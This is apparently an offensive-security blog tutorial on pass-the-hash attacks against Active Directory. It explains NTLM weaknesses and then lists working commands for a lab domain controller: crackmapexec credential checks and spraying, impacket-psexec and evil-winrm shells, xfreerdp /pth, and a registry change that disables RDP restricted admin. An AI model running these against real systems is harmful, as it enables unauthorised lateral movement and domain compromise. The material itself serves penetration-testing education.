What is Pass the Hash
A pass the hash attack occurs when an attacker obtains the hashed password of a user and uses it to authenticate themselves to other resources on the network. This is possible because the hashed password can be used in place of the plaintext password in the authentication process.
Pass the hash attacks are typically used by attackers who have already gained access to a network and are looking to move laterally and gain access to additional resources. The attacker takes an NTLM hash of a user and uses it to authenticate to the network without the need for the user’s plaintext password. This makes it easier for the attackers since they won’t have to spend time cracking the hash.
Understanding Active Directory Authentication
The LM authentication protocol, also known as LAN Manager, is an outdated and insecure method of authentication. Microsoft replaced LM with NTLM, which in turn was succeeded by NTLMv2 due to pass the hash and replay attack vulnerabilities that were fixed in NTLMv2. With the introduction of Active Directory, Microsoft began using Kerberos as the preferred authentication protocol, but NTLM is still enabled in Windows for compatibility reasons since older systems don’t have Kerberos. Windows gives you the option to disable NTLM hashes but most environments have them on. As a result, pass the hash attacks are a persistent security risk in Active Directory environments.
How are NTLM hashes obtained
Attackers use various methods to obtain NTLM hashes, but the most prevalent method is through post-exploitation activities using tools like Mimikatz. Another way is by extracting the hashes from the NTDS.dit file.
Example: There is an Active Directory Domain with a Windows machine and a Domain Controller. The attacker manages to escalate privileges on the Windows machine and runs mimikatz to dump hashes of all the users that have previously logged into the machine. The attacker finds the NTLM hash of a Domain Admin and uses that hash to authenticate to the Domain Controller.
How to pass the hash
There are multiple services that we can exploit using the pass the hash method. These services include:
- SMB (Port 445)
- Win-RM (Port 5985)
- RDP (Port 3389)
Scenario: We obtained the NTLM hash for the user “T.Stark”. Lets try different ways to get access to the Domain Controller using the hash.
Pass the Hash on SMB
Crackmapexec allows us to check if the credentials valid for different services.
Using crackmapexec with the smb option shows “Pwn3d!” meaning we can log into the machine through smb.
crackmapexec smb 192.168.5.5 -u T.Stark -H AF9627EAD6DF998951AA0BCB53301FF0
To actually get a shell we can use Impacket’s Psexec. This tool will only work if the user we have credentials for is an Admin.
impacket-psexec WANDA.local/T.Stark@192.168.5.5 -hashes "0:AF9627EAD6DF998951AA0BCB53301FF0"
Note: We have to specify 0: before the hash because psexec expects two values.
Pass the Hash on Win-RM
We can check if the credentials work on Win-RM using crackmapexec.
crackmapexec winrm 192.168.5.5 -u 'T.Stark' -H 'AF9627EAD6DF998951AA0BCB53301FF0'
The screenshot above says “Pwn3d!” which means that we are able to log into the machine with Admin privileges.
If the user isn’t an Admin but has permissions to login through winrm, it’ll also say “Pwn3d!”.
crackmapexec winrm 192.168.5.5 -u 'J.Williams' -H 'DCD80EFD3117F7D9EC2F0911A44996FA'
To actually get a shell through win-rm, we can use a tool called “evil-winrm”.
evil-winrm -i 192.168.5.5 -u 'T.Stark' -H AF9627EAD6DF998951AA0BCB53301FF0
Pass the Hash (RDP)
Even though crackmapexec has the option to check rdp for valid credentials, it doesn’t really work. This means we can’t test the credentials and have to go straight to attempting to access it.
We can use xfreerdp with the “/pth” option to pass the hash.
xfreerdp /v:192.168.5.5 /u:T.Stark /pth:"AF9627EAD6DF998951AA0BCB53301FF0"
The credentials seem to be correct but we get an error telling us this account has restrictions.
We can use crackmapexec with the smb option to help fix this error. If you want more details about how the command works, check this.
crackmapexec smb 192.168.5.5 -u T.Stark -H AF9627EAD6DF998951AA0BCB53301FF0 -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'
If we try xfreerdp again, we don’t get an error and are able to log into the Domain Controller
Spraying the Hashes
Crackmapexec also has an option to spray credentials meaning if you have a list of usernames or hashes, you can try them all on each other to see if they work.
File with usernames:
Command:
This also works the other way around. If you have a list of hashes, you can try to spray them across the network.
Thanks for reading! Be sure to share this post if you enjoyed it.
